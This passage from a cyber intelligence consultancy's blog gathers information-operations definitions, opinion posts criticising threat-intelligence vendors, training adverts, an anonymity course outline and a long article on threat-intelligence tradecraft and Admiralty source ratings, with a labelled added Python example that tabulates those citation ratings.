  2. Computer Network Operations (CNO)
    1. Comprised of computer network attack, computer network defense, and related computer network exploitation enabling operations (JP 1-02)
  3. Psychological operations
    1. Planned operations to convey selected information and indicators to foreign audiences to influence their emotions, motives, objective reasoning, and ultimately the behavior of foreign governments, organizations, groups, and individuals. The purpose of psychological operations is to induce or reinforce foreign attitudes and behavior favorable to the originator’s objectives. (JP 1-02 and JP 3-13.2)
  4. Military Deception
    1. Actions executed to deliberately mislead adversary military decision makers as to friendly military capabilities, intentions, and operations, thereby causing the adversary to take specific actions (or inactions) that will contribute to the accomplishment of the friendly mission. (JP 1-02)
    2. According to JP 3-13.4, Counterintelligence provides the following for MILDEC planners:
      1. Identification and analysis of adversary intelligence systems to determine the best deception conduits;
      2. Establishment and control of deception conduits within the adversary intelligence system, also known as offensive CI operations;
      3. Participation in counterdeception operations;
      4. Identification and analysis of the adversary’s intelligence system and its susceptibility to deception and surprise; and
      5. Feedback regarding adversary intelligence system responses to deception operations.
  5. Operations Security

OPSEC is a five-step iterative process that assists an organization in identifying specific pieces of information requiring protection and employing measures to protect them.

  1. Identification of Critical information: Critical information is information about friendly intentions, capabilities and activities that allow an adversary to plan effectively to disrupt their operations. U.S. Army Regulation 530-1 has redefined Critical Information into four broad categories, using the acronym CALI: Capabilities, Activities, Limitations (including vulnerabilities), and Intentions. This step results in the creation of a Critical Information List (CIL). This allows the organization to focus resources on vital information, rather than attempting to protect all classified or sensitive unclassified information. Critical information may include, but is not limited to, military deployment schedules, internal organizational information, details of security measures, etc.
  2. Analysis of Threats: A Threat comes from an adversary – any individual or group that may attempt to disrupt or compromise a friendly activity. Threat is further divided into adversaries with intent and capability. The greater the combined intent and capability of the adversary, the greater the threat. This step uses multiple sources, such as intelligence activities, law enforcement, and open source information to identify likely adversaries to a planned operation and prioritize their degree of threat.
  3. Analysis of Vulnerabilities: Examining each aspect of the planned operation to identify OPSEC indicators that could reveal critical information and then comparing those indicators with the adversary’s intelligence collection capabilities identified in the previous action. Threat can be thought of as the strength of the adversaries, while vulnerability can be thought of as the weakness of friendly organizations.
  4. Assessment of Risk: First, planners analyze the vulnerabilities identified in the previous action and identify possible OPSEC measures for each vulnerability. Second, specific OPSEC measures are selected for execution based upon a risk assessment done by the commander and staff. Risk is calculated based on the probability of Critical Information release and the impact if such a release occurs. Probability is further subdivided into the level of threat and the level of vulnerability. The core premise of the subdivision is that the probability of compromise is greatest when the threat is very capable and dedicated, while friendly organizations are simultaneously exposed.
  5. Application of Appropriate OPSEC Measures: The command implements the OPSEC measures selected in the assessment of risk action or, in the case of planned future operations and activities, includes the measures in specific OPSEC plans. Countermeasures must be continually monitored to ensure that they continue to protect current information against relevant threats. The U.S. Army Regulation 530-1 refers to “Measures” as the overarching term, with categories of “Action Control” (controlling one’s own actions); “Countermeasures” (countering adversary intelligence collection); and “Counteranalysis” (creating difficulty for adversary analysts seeking to predict friendly intent) as tools to help an OPSEC professional protect Critical Information.

Offensive Cyber Operations. Programs and activities that, through the use of cyberspace, 1) actively gather information from computers, information systems or networks or 2) manipulate, disrupt, deny, degrade, or destroy targeted adversary computers, information systems, or networks. (NSPD-38)

Cold War – a state of political hostility between countries characterized by threats, propaganda, and other measures short of open warfare – a conflict or dispute between two groups that does not involve actual fighting.

Cyber War – the use of computer technology to disrupt the activities of a state or organization, especially the deliberate attacking of information systems for strategic or military purposes. Cyber warfare involves the actions by a nation-state or international organization to attack and attempt to damage another nation’s computers or information networks through, for example, computer viruses or denial-of-service attacks.

Try this link for more definitions https://ccdcoe.org/cyber-definitions.html

To repeat: think of where we are today with respect to cyber security. Apply critical thinking to the terms and our current state of cyber security. Assess our relationship with Russia. Provide some well thought out comments as to what state we are in fact in if you believe we are not in a state of cyber cold war with Russia. If we are not, then how would you define our current state?

Treadstone 71

Featured post

Cyber Security Predictions – Not Even Reality TV – Just Daytime Entertainment

The plethora of 2017 cyber security predictions do nothing but distract practitioners from executing actual controls and methods of defense and prevention. Each year we get slammed with predictions that are never followed, are common sense, and serve to market and sell products and services. The so-called information and cyber security experts, many times self-proclaimed, spew predictions on all potential areas. This is not much more than fake news and methods to direct readers to vendor products. Vendor products then claim to solve these predictions, which therefore become self-fulfilling prophecies. For the most part, once the predictions are published, the follow-up to their success is non-existent. Their purposes are to market and sell, drive perception, manage the market, and drive a false sense of vendor expertise.

We should focus on actual problem resolution and change the failed paradigm within which security exists. We continue to propagate vendor products and services that do not work, only treating the symptoms. This is not much different from the pharmaceutical industry that markets pills to you each evening during the news and prime time. Pills that treat symptoms and cause more side effects than they do solve issues. Advertisements that drive up the cost of the product manipulating the market and those that prescribe the ‘solutions’ to recommend purchase.

The only way we change this paradigm, and I mean we, is to push back on these vendors to solve problems and quit selling products that treat symptoms. We must also correct our own internal behaviors. A few weeks ago, I published a potential list of 12 items to change this paradigm (the 12th is a shameless plug so 11). They are listed below.

We need to forget the Jerry Springer-like entertainment of annual cyber predictions and focus on solving the hard problems we face.

What does Treadstone 71 seek? We seek an end to the noise and an understanding that our information, our intellectual property, and our way of life is under constant siege. We are in a cyber war with skirmishes and battles occurring 24×7. We need to direct the carpetbagging vendors to cease in their war profiteering and take a moral stance in fighting our adversaries. We also need to correct and adjust how we run IT and information security. The list of 11 is below. We welcome your comments, your additions, and your assistance in this call to action to change the failed paradigm.

Treadstone 71

  1. All CIOs must have served as a CISO for at least four years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least two technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code that works correctly and does not create vulnerabilities.
  9. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls.
  10. New regulations to enforce security and privacy, demanding disclosure of breaches, fining companies and individuals for negligence are put in place, at once.
  11. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.
  12. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Decided to add a real 12:

  12. Let’s create a focused call to action to change the paradigm. Open to suggestions, dedicated forums, public push to change vendors, public push to force IT to change.

Call to Action!

Featured post

Igor Valentinovich Korobov, the current chief of a military intelligence agency Игорь Валентинович Коробов

Glavnoje Razvedyvatel’noje Upravlenije
ГРУ ГШ ВС РФ
Главное Разведывательное Управление

Agency overview
Formed: May 7, 1992
Preceding agencies
Jurisdiction: President of Russia
Headquarters: Grizodubovoy str. 3, Moscow
Minister responsible
Agency executive: Igor Korobov, Chairman
Parent agency: Ministry of Defense
Child agencies:
  • Svyazinformsoyuz Company
  • Directorate for Space Intelligence

Featured post

The 12 Days of Cyber Christmas

…or What I want for Cyber Security and Intelligence Christmas 2016

  1. All CIOs must have served as a CISO for at least 4 years before being allowed to be a CIO.
  2. All CIOs must have a CISSP, CISM, and at least 2 technical information security certifications and have been thoroughly trained and qualified to be a CIO. No more cronyism.
  3. CISOs will never report to the CIO – conflict of interest and a recipe for … what we have now.
  4. If you are the administrator for a device, you secure that device (servers, routers, appliances, etc.). You are responsible and accountable – Secure what you own. Secure what you manage.
  5. CIOs and their leadership will be held liable for deploying vulnerable systems.
  6. All new products (IoT and beyond) must be certified secure before public release. No more figure it out as we go and bolt it on after we have consumers hooked.
  7. All root access / administrative rights for production, critical, supporting, etc., systems and devices are removed and granted only for approved changes and incidents.
  8. All written code and script must be written properly. There is no such thing as secure code, only code that works correctly and does not create vulnerabilities.
  9. All operating systems will be shipped closed and installed closed with a risk rating system for each port, protocol, and/or service. Each modification reduces the security posture of the operating system providing a risk score while automatically offering advice on how to remediate that score with other controls.
  10. New regulations to enforce security and privacy, demanding disclosure of breaches, fining companies and individuals for negligence are put in place, at once.
  11. Vendors posting adversary IoCs, TTPs, and other methods that would normally be seen as ‘telling the enemy what we know, i.e., sedition’ will be fined for such activity.
  12. You will tell yourselves over and over again that contracting with Treadstone 71 to build your cyber intelligence strategy and program is the absolute right thing to do (repeat after me …).

Merry Cyber Christmas from Treadstone 71

Featured post

Clandestine Cyber HUMINT 

CLANDESTINE CYBER HUMINT/OSINT COURSE

Course snippet non-inclusive of Tails, Tor, Dark Net, and Oryon:

Find the course information and registration here:

CLANDESTINE CYBER HUMINT/OSINT COURSE

…..

1. Anonymity
2. What is anonymity online?
3. Tails
1. What is Tails?
2. Tails and Tor Bridge Mode
3. Tor Project
1. Overview
2. Who uses Tor?
3. Tor – A Layman’s Guide
4. Tails – Tor enforcement
5. Tails Installation Assistant
6. Install from Windows
7. I2P Anonymous Network
8. Intro I2P

…..

4. Information Warfare and Cyber Psychological Operations
1. Target analysis and message manipulation where applicable
1. Gathered data
2. Organized and decomposed data points
a. Established timelines
b. Created adversary dossiers and organization charts

…..

5. Intro to the Darknet
5.1 Introduction to the Darknet (NOTE: Some/Many of the sites come and go and may not be available for review)
5.1.1 How to Access Onion Sites
5.1.2 Tor – Download, Installation, Use
5.1.3 Markets to Search
5.1.4 Site for Exploration:

…..

Featured post

Amsterdam, NL 1/30-2/3/2017 Cyber Intel Training

Registration Information – Treadstone 71 Cyber Intelligence Tradecraft Certification
Dates and Times TBD

https://cybershafarat.com/2016/07/31/intelligenceanalysis/

http://www.planetreg.com/intelAmsterdam to register for the course.

*********************************************************************
Cyber Intelligence Tradecraft Certification
Cyber CounterIntelligence Tradecraft Certification
Cyber Intelligence Analyst Certification

Upcoming Classes

*********************************************************************

Featured post

Proposed 2017 Training Dates – US

*********************************************************************

Cyber Intelligence Tradecraft Certification

Cyber CounterIntelligence Tradecraft Certification

Cyber Intelligence Analyst Certification

Upcoming Classes

Featured post

Fallacies in Threat Intelligence Lead to Fault Lines in Organizational Security Postures

This article is partially written in analytic writing format starting with the conclusions first. The Conclusion section does not include normal analytic paragraphs and alternative analysis following standard intelligence tradecraft analytic writing. Instead, the Recommendations and Opportunities section represents supervisory actions. The article uses the Admiralty System or NATO System as a method for evaluating collected items of intelligence recognized by a letter/number combination found after article citations. The article discusses the issues associated with threat intelligence, the need for a common understanding of taxonomy and glossary, as well as presenting a case for intelligence tradecraft as a common standard. Furthermore, the article takes vendors to task for their reporting methods, content, and intent while providing a listing of recommendations and opportunities for organizations that may assist them in their building of organizational intelligence capabilities. The focus is on intelligence as it relates to cyber security / information security in as much as the length of this article allows.

Read the article here as PDF: fallacies-and-fault-lines-treadstone-71

or the slightly updated version here: Stakeholder Brief-Understanding Intelligence

Conclusion

Organizations follow inaccurate definitions of threat intelligence leading to poorly conceived cyber threat intelligence programs. Vendors communicate threat intelligence definitions supporting their offerings propagating the fallacy that threat intelligence solves numerous security problems.

Cyber Threat Intelligence functions are being built on a foundation that is not supported by standard intelligence tradecraft. Many programs support a fraction of the intelligence needs, yet stakeholders hold unrealistic expectations based upon expenditures.

Information security capabilities marginally improve as spending skyrockets and security posture improvement is limited to after-the-fact discoveries communicated as prevention.

Continued purchases of ‘threat intelligence’ tools based on the see-detect-and-arrest paradigm ensure slow improvement and loss of data expansion. Intelligence program builds focused on technology capabilities repeat the historical problems of information security when firewalls and anti-virus represented the core of security programs.

Recommendations and opportunities normally located in this report position follow below in the Recommendations and Opportunities section.


Access to organizations who may be more advanced presents gaps in data available for this article. We based evidence upon direct access to some Fortune 500 organizations, discussions during cyber intelligence training classes, and actual intelligence program build activities.

Common Taxonomy

A general Internet search on ‘threat intelligence’ returns 11 million results in .36 seconds demonstrating the intentional propagation of a term intended to generate revenue. Information and cyber security vendors, reputable training organizations, and companies use the term so often it has lost any real meaning. Most vendors use the term as if intelligence is easily created, readily available. Products are sold with the expectation that threat intelligence is the panacea CISOs have sought for years. This is (the expectation) a general misnomer and cyclical in the regular creation and use of buzzwords and catch phrases that change annually. Vendors create years of capabilities based upon the jargon that just yesterday, no one even knew existed. One of those buzzwords is threat intelligence.

What is threat intelligence? Gartner indicates this to be:

Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject’s response to that menace or hazard. (Gartner, 2013) C3

Solutionary (NTT) uses this definition from the Central Intelligence Agency:

Reduced to its simplest terms, intelligence is knowledge and foreknowledge of the world around us. The prelude to decision and action by U.S. policymakers. Intelligence organizations provide this information in a fashion that helps consumers, either civilian leaders or military commanders, to consider alternative options and outcomes. The intelligence process involves the painstaking and generally tedious collection of facts, their analysis, quick and clear evaluations, production of intelligence assessments, and their timely dissemination to consumers. Above all, the analytical process must be rigorous, timely, and relevant to policy needs and concerns. (Security, 2016) A1

NTT Security then goes on to say that instead of providing military or political intelligence to government stakeholders, the current focus within the information security industry is to deliver threat intelligence to an organization’s stakeholders about digital threats to their enterprise systems. (Security, 2016) B2

NOTE: What Is Intelligence? Introduction – Muskingum University. (n.d.). Retrieved from http://intellit.muskingum.edu/whatis_folder/whatisintelintro.html (not cited by NTT)

Data and information need definition as well. Many reports and daily deliverables are termed to be intelligence when they only meet the criteria of data or information.


Figure 1 Data and Information (University of New England, 2011)

Definitions Misunderstood

Herein lies one of the most basic issues that vex many organizations today, whether understood or not. The myopic view that the missing cog needed to protect an organization is technical threat intelligence. We couple this with additional fallacies a bit later. Fallacies that create massive fault lines in our cyber security postures guaranteed to lead to unrealistic expectations and program gaps.

Definitions for intelligence range in scope and depth based upon who is using the term. We tend to stay close to traditional tradecraft definitions such as those below:

The product resulting from the collection, processing, integration, evaluation, analysis, and interpretation of available information concerning adversaries (script kiddies, novices, cybercriminals, nation-states, hacktivists, political activities, insiders, whitehat/blackhat hackers, cyber terrorists, competitors, investigative reports, academics) hostile or potentially hostile cyber elements, or areas of actual or potential operations. (Government, Joint Intelligence, 2013) A1

Also, a body of evidence and the conclusions drawn from what is acquired and furnished in response to the known or perceived requirements of consumers. It is often derived from information that is concealed or not intended to be available for use by the acquirer. (Government, 2013) A1

Alternatively, data and information that is sourced openly, and when placed through a process of decomposition, analysis, recomposition, and synthesis, becomes intelligence.

Figure 2 MWR Model of Threat Intelligence


It gets quite confusing. Which definition should we follow? For pure terminology, MWR InfoSecurity in the United Kingdom seems to have a solid handle on the threat intelligence definition. MWR proposes a model that breaks down threat intelligence into four distinct categories based on consumption: strategic, operational, tactical, and technical. (InfoSecurity, 2015) B3 MWR’s model (Figure 2) is well defined, detailed, and something organizations should read and recognize.

Strategic, Operational, Tactical, and Technical Intelligence – Defined with Respect to Threats

Strategic Intelligence is defined as the high-level information, consumed at board level or by other senior decision-makers and stakeholders at the business leadership level. (InfoSecurity, 2015)

Operational Intelligence is defined as Information about specific imminent attacks against the organization and is initially consumed by higher-level security staff, such as security managers or heads of incident response. Operational Threat Intelligence also includes attacks in progress, day-to-day situational awareness, surveillance and warning while focusing on adversary intentions. (InfoSecurity, 2015)

Tactical Intelligence is defined as the Tactics, Techniques, and Procedures (TTPs) and is information about how threat actors are conducting attacks. (InfoSecurity, 2015)

Technical Intelligence is defined as the Information (or, more often, data) that is normally consumed through technical means. IP addresses, domains, domain information, MD5 sums, log monitoring, technical data feeds from internal and external technologies and providers are included in this listing and are often termed to be Indicators of Compromise (IoCs).

The problem with this model is the exclusive focus on threat intelligence. Threat intelligence is a subset of intelligence. Threat intelligence assumes that a certain amount of data and information has been collected, creating intelligence that is then aligned to organizational threats. Threat intelligence does not always include the correct data. Most times, the data is tactical and technical in nature, leaving significant gaps. Other times that data is skewed by the inherent bias of the technologies through which it is collected and filtered. In the end, it lacks scope, depth, and breadth, and is deficient in tradecraft. Other types of intelligence reporting rarely covered in organizations include basic and foundational intelligence, research intelligence, competitive, and estimative intelligence. For more information on types of intelligence, see cia.gov. Traditional warning intelligence is what the information security industry calls threat intelligence.

What is Tradecraft?

Unfortunately, most of what is produced is data and, at best, information. This starts with the misunderstanding as to what data is versus information as opposed to actual intelligence. The term is a core component of sales, neglecting the difficult process of creating intelligence while presenting data and information as actionable intelligence. Creating intelligence is a process that requires hard-nosed collection, attention to detail in production, structured methods and techniques, awareness of critical thinking and cognitive bias, the use of analytic methods, and the patience and perseverance that comes with knowledge creation. This is called tradecraft.

Let’s not confuse tradecraft as being something that is military intelligence. Many believe intelligence tradecraft is military in form and function. This is not true. The intelligence tradecraft of which I speak is rooted in CIA capabilities honed over years of trial, error, mistakes, and triumphs. The writings of Sherman Kent, long held as the father of intelligence analysis, defined methods of intelligence analysis used today. Kent’s analytic standards, doctrines, and practices need to be applied today within cyber threat intelligence functions. (Davis, 2007) A1 The writings of Richards J. Heuer Jr., a 45-year CIA veteran, describe issues with critical thinking, cognitive bias, and structured analytic techniques used today as well. The writings of both men are directly applicable to information security efforts to create threat intelligence. Their use enables organizations to see beyond the limited view of ‘see, detect, and arrest’ while progressing to data collection, analysis, and intelligence creation used to prevent and eventually predict adversary actions. Also, tradecraft is the underlying framework for intelligence upon which military and non-military programs should be built.


Many of the fallacies we face as cyber security professionals relate to a lack of understanding of what it takes to be an intelligence professional. The two are not mutually inclusive. Security operation centers are not populated with intelligence professionals. They are not occupied by analysts skilled in the arts professed by Sherman Kent and documented by Richards Heuer. In fact, most cybersecurity professionals find tradecraft to be distasteful and a general waste of time. This conclusion is drawn from the many engagements across the globe with cyber security professionals. When we come onsite to help build the intelligence program, we immediately face resistance if the focus is not on low-level, technical activities. Most do not have a grasp, respectfully, of the need for a well-built intelligence program that is top-down as opposed to technically oriented, bottom-up. Most have not had training in intelligence analysis or tradecraft. Real-world intelligence analysts endure rigor, structure, and focused training that specializes in the craft of intelligence analysis, the core function of any intelligence organization. They learn how to think, write, and brief. They study analytic tools, counterintelligence issues, denial and deception, analysis, and warning skills. (Agency, 2007) A1

Another fallacy is that former military intelligence soldiers and National Security Agency staff are skilled in tradecraft. Not to say that they are not capable or that they have not had intelligence courses, but the courses are largely focused on physical, military action. Their version of tradecraft is specific to their missions and requirements. The NSA trains collectors to collect and analysts to analyze and, most times, never the twain shall meet. We have direct knowledge of these methods. The protocol is compartmentalization and separation of duties as a higher priority over continuity of effort and understanding. The intent here is to point out that their skills are very focused on many different areas associated with intelligence. Whether the type is signals based or human, the methods do not include the end-to-end scope of traditional intelligence tradecraft. What we have found is their adoption to be much faster, their understanding of the model more inclusive than cyber security professionals. In general, the ability to adapt, adopt, and incorporate the tradecraft model is not a stretch for these men and women due to their backgrounds.

The Daily Crises

We spend countless hours preparing daily reports, responding to daily incidents, and dealing with the issue du jour. Morning standup meetings are preceded by a daily data push many call intelligence. We establish serialized reporting where each day we deliver a threat report; each week a weekly threat rollup; each month a roll-up of each week and so on. We spend so much time gathering current data and fighting daily issues we never get to a point where we can perform intelligence-type work. This is largely self-inflicted. This fallacy in our process ensures we will never have the ability to analyze data based on the historical collection. The collected data is all current. The scope for that data is immediate. The data is not arranged in such a way as to facilitate long-term analysis. Of course, there needs to be a balance between the long-term analysis and the short-term reporting. The fallacy is that the short-term reporting is communicated as intelligence analysis product when it is mostly a regurgitation of open source data and readily available vendor reports.

Letting the Enemy Know What We Know

Vendor reports with cute names dot the landscape documenting the tactics, techniques, and procedures (TTPs) of adversaries. Detailed lists of adversary IoCs populate the appendices of said reports. The reports list the capabilities of the vendors verifying their prowess at uncovering adversaries. Adversary mistakes are lauded with great swagger. The reports list many conclusions without citation, with little discussion of likelihoods, limited communication of confidence levels, and no discussion of gaps in their collection, production, or analysis. The reader is left to trust the report at face value. The reports are positioned as absolute in their reasoning, yet the logic may be poorly crafted. Sweeping conclusions that oversimplify the problem are the hallmark of the reports. Blanket statements used to persuade the reader are repeated in the reports to hammer home the need to purchase services from these vendors.

Written to market and sell products and services, the reports do not discuss the potential for denial and deception. Could the data be forged or faked before vendor acquisition? Is it possible their collection methods or sensors are in error or misinterpreted? How did the vendor determine source credibility and reliability? Is there any bias in the technology used or human analysis of the data collected? Are adversaries using heuristics to lull vendors into comfort levels of consistency all the while they are deceiving vendors with traditional maskirovka, the well-honed Russian use of deception? The belief is yes; our vendors are being lulled into comfort levels. As we clearly communicate what we know about them, our adversaries adopt new methods to deny and deceive us all the while they continue to project activities that reflect old TTPs. On the contrary, deception existed as far back as recorded time. The Trojan horse, double agents, and tactical deception is a strategy that turns the tide of battles. (Hames, 2014) A1

The practice of deception to trigger an action is a key method of generating data that can be turned to intelligence. Triggering an action leads to the collection of data not only from the first ripple in the so-called pond but from second and third order effects. An old USAF tactic is to circle with fighter jets near the 12-mile limit of a country’s ocean border. The jets circle and circle while an RC-135 is nearby collecting data. Eventually, one or both of the jets turns on the afterburners crossing the border. Acquisition radars turn on, missile sites light up, all the while the RC-135 is collecting data. A treasure-trove of information is collected as radio chatter fills the airwaves. The jets turn back and the collection slowly subsides. The intent clear. The data collected, great. Our adversaries use the same tactics in the cyber environment to determine our readiness posture, technical capabilities and methods for defense.

Is This Sedition?

The real travesty with the vendor threat reports is the fact that they are openly published. Cyber warfare is upon us. Adversaries and enemies scour blogs, forums, chat rooms and personal websites to piece together information that is used to harm the government, commercial organizations, and individuals. They utilize methods of espionage extracting sensitive data at unprecedented rates. When discovered, cyber security vendors feel a need to publish every TTP, each IoC, and their malware and individual hacker courses of action to the world. The damage done by these actions is pure negligence. It is very surprising that the government does not ask the vendors to suppress the details. If one of their own were to release such data, we would be reading reports for charges of treason. The reports serve to bolster vendor sales while informing the enemy what we know about them and their TTPs. Many of these reports reference other vendor reports on the same topic providing circular reasoning that further, albeit falsely, solidifies their conclusions (demonstrated clearly in the reports on Rocket Kitten). This behavior serves to drive the enemy to increasingly creative and undetectable methods of scanning, penetration, and data exfiltration. They change these methods more frequently in light of the constant barrage of vendor reports; many timed just before or during well-known cyber security conferences. The organizations who have penetrated the enemy and adversary forums, chat rooms, and new methods of communication while using the access to learn more about them, may miss the ‘frequency change’ due to the vendor reports. By frequency change I refer to the old methods of rolling up on a radio frequency, learning about the enemy including alternative frequencies, and making the change to that frequency when the request is broadcast. Today the methods are much more dynamic, the communications many times encrypted, and the changes very subtle.

Figure 3 Admiralty Code – Hanson

Fallacies that Create Fault Lines

As discussed above, we believe the fallacies in threat intelligence stem from a lack of agreed upon glossary and taxonomy. Also, the industry’s acceptance of vendor solutions to provide actual intelligence, and vendor reports taken at face value without source validation or citation. The organizational placement of intelligence within information security, many times incident response, as well as the incorrect understanding of what an intelligence professional is, and the inability of organizations to see beyond purely defensive measures for information security all contribute to the issue. These fallacies, understood to be non-inclusive, create natural fault lines in our security programs.

Recommendations and Opportunities

Changing Behaviors

What can we do to rectify the path of fallacies we continually choose to follow?

First (in no specific prioritized order) we must educate everyone in information technology, information security, and the C-Suite on the standard taxonomy of intelligence. This provides a shared understanding and baseline glossary upon which to build communication.

Secondly, we must treat each vendor report as nothing more than another source of data. Data that must be evaluated for credibility, reliability, and relevance. To do so, we can use the NATO Admiralty Code (Figure 3) (Hanson, 2015) A1, used throughout this article to rate sources in the format of (A1, B2, B3, etc.). The code helps organizations evaluate sources of data and the credibility of the information provided by that source. Evaluate each vendor report using this coding method while documenting ease of data extraction, relevance to your organizational issues, type of intelligence (strategic, operational, tactical, and technical), and value in solving your security problems.
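An added example, not from the original article or from Treadstone 71: a short Python source register that reads citations in this article's own "(Source, Year) A1" format, expands each rating with the standard Admiralty wording, and assigns a handling action. The action names and the B/2 acceptance threshold are assumptions for illustration, and the sample text is constructed from citations on this page plus one invented "Example Vendor" entry.

```python
import re
from collections import Counter
from typing import List, NamedTuple, Optional

# Standard Admiralty (NATO) scale wording. F and 6 mean "cannot be judged";
# they sit outside the ordered A-E / 1-5 scale rather than at its bottom.
RELIABILITY = {
    "A": "Completely reliable", "B": "Usually reliable", "C": "Fairly reliable",
    "D": "Not usually reliable", "E": "Unreliable", "F": "Reliability cannot be judged",
}
CREDIBILITY = {
    "1": "Confirmed by other sources", "2": "Probably true", "3": "Possibly true",
    "4": "Doubtful", "5": "Improbable", "6": "Truth cannot be judged",
}

# "(Author, 2015) B3" as written in this article. The trailing rating is
# optional because some of the article's own citations carry none.
CITATION = re.compile(r"\(([^()]+),\s*(\d{4})\)(?:\s+([A-F][1-6])\b)?")


class Entry(NamedTuple):
    source: str
    year: int
    rating: Optional[str]
    reliability: str
    credibility: str
    action: str


def triage(rating: Optional[str], min_reliability: str = "B",
           min_credibility: str = "2") -> str:
    """Map a rating to a handling action (hypothetical policy, not the article's)."""
    if rating is None:
        return "rate-before-use"      # cited but never evaluated
    letter, digit = rating[0], rating[1]
    if letter == "F" or digit == "6":
        return "collect-more"         # unknown, not bad: needs more collection
    if letter <= min_reliability and digit <= min_credibility:
        return "accept"
    return "corroborate"              # usable only alongside another source


def build_register(text: str, **policy: str) -> List[Entry]:
    """Extract every citation in the text and attach labels and an action."""
    entries = []
    for match in CITATION.finditer(text):
        source, year, rating = match.group(1).strip(), int(match.group(2)), match.group(3)
        entries.append(Entry(
            source, year, rating,
            RELIABILITY[rating[0]] if rating else "Not rated",
            CREDIBILITY[rating[1]] if rating else "Not rated",
            triage(rating, **policy),
        ))
    return entries


def summarize(entries: List[Entry]) -> Counter:
    """Count how many sources fall under each handling action."""
    return Counter(entry.action for entry in entries)


# Constructed sample: citation strings as they appear in this article, plus
# one invented entry ("Example Vendor") to exercise the F6 case.
SAMPLE = (
    "inform decisions regarding the subject's response. (Gartner, 2013) C3 "
    "relevant to policy needs and concerns. (Security, 2016) A1 "
    "digital threats to their enterprise systems. (Security, 2016) B2 "
    "areas of actual or potential operations. (Government, Joint Intelligence, 2013) A1 "
    "tactical, and technical. (InfoSecurity, 2015) B3 "
    "why they are confident. (Katherine Hibbs Pherson, 2012) This helps "
    "a feed of indicators with no stated origin. (Example Vendor, 2016) F6"
)

if __name__ == "__main__":
    for entry in build_register(SAMPLE):
        print(f"{entry.source:32} {entry.rating or '--':3} {entry.action:16} "
              f"{entry.reliability} / {entry.credibility}")
    print(dict(summarize(build_register(SAMPLE))))
```

Passing `min_reliability` and `min_credibility` to `build_register` changes the acceptance bar, while F, 6 and unrated sources keep their own actions regardless of the threshold.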

Thirdly, begin to grow and expand your intelligence program functions. Learning methods of anonymity, open source data collection, collection management and planning, production management of intelligence functions, analysis, and analytic writing and dissemination adds immediate value to your organization. Understand that intelligence is not the same as incident response or a core component of the security operations center. These skills are unique and must be shared but to bury them within these areas is a mistake. We faced this for years (and still do) putting information security under information technology treating it as a solely technical issue. We should not make the same mistake with intelligence. Intelligence functions need direct access to organizational stakeholders.


Figure 4 Intelligence Analysis Format – SAMPLE

Fourth, create standard processes to seek out malicious actions within your information technology environment. Use adversary TTPs to drive your ‘hunt and detect’ but understand that this, albeit a valuable capability, is not a proactive function. They are already inside the wire and must be removed. Organizations need to do this for proper hygiene.


Fifth, develop methods within your organizational risk model to collect open source data regularly. Like our third point above, we must grow this function so we collect data and information, and develop intelligence that is pertinent to our stakeholders and our organization. Capture priority intelligence requirements, create information requirements prioritized and vetted focusing on all sources of data including open source collection. Devise methods for mission management that drive targeting for passive collection.

Make note that many vendor report subscriptions provide generalized and generic data and information. Periodically, intelligence is part of the report. Occasionally, something relevant to your organization is included. Most times the reports are of a ‘create once, distribute many’ format.

To drive industry change, work with vendors. Request and require source credibility ratings, citations with confidence levels, explanations of analytic methods, and resumes of staff working your contracts.

What are confidence levels?

Confidence levels relate to evidence helping intelligence staff state not just how confident they are as analysts but why they are confident. (Katherine Hibbs Pherson, 2012) This helps intelligence functions define why they believe something (the because) at what level based upon high, moderate, and low as defined below in Figure 5.


Figure 5 National Intelligence Council Confidence Levels

Sixth, create a model of your adversaries and their capabilities that are target centric. Expand your collection to include all areas concerning your adversary. The only way to fully understand what threatens your organization is to fully understand the enemy, their motivations, their competence, and their skills. Otherwise, organizations will continue to play a basketball game on defense, never crossing the half-court line. A recipe for assured loss.

Seventh, write in intelligence analysis format. Stakeholders have little time. Making them hunt for the answers ensures failure. Use the guide in Figure 4 above to assist in your writing, Intelligence Analysis Format.

Eighth, create a strategic plan followed by a program plan for intelligence in your organization. Define what it is and is not. Author a vision and mission along with guiding principles. Develop a series of goals with three to four objectives each determining how to achieve those goals. Gain acceptance and follow the plans.

Ninth, set up a listening tour of your lines of business and corporate stakeholders. Gain permission to attend their meetings with the understanding that you are there to listen and learn. Do not offer your services. Listen to digest and gain knowledge of your stakeholders. Do not listen to prepare a response. Gather this information and take it back to your organization to help your program move forward. You may believe you know your company but knowing your professor ensures an ‘A.’

Tenth, give your organization time to implement an intelligence function. Determine what makes sense for your organization as to what that timeframe is. Institutionalize lesson-learning as a process of performance improvement, not assessing blame. (Gabbard, 2008) B1 Give your intelligence organization time to learn. Making mistakes in the early stages of maturity is expected. Just do not make the same mistakes repeatedly. Give your intelligence organization the authority to make decisions and the access to stakeholders to learn requirements and communicate capabilities. Establish goals and objectives that are reachable and practical. Stretch goals when first building a function can lead to unnecessary failures. Leadership and the right level of leadership are required to manage analysts. Find the right level for your organization. When you add an intelligence function to an organization that has never had one, manage expectations. Eventually, a properly staffed, trained, and led group can deliver significant value to the organization.

Lastly, although non-inclusively, prepare your organization for the next steps. Those next steps involve counterintelligence. Although now seen as a high-risk area for organizations, my belief is that we will eventually adopt certain principles associated with this tradecraft. In fact, several organizations already employ methods associated with counterintelligence, both passive and active. In 2011, we adapted the Ten Commandments of Counterintelligence into a list focused on cyber. They are:

  1. Be offensive
    1. Do not be afraid to anonymously collect information on your adversaries. In many cases, they are hiding in plain sight. You just need to know where to look.
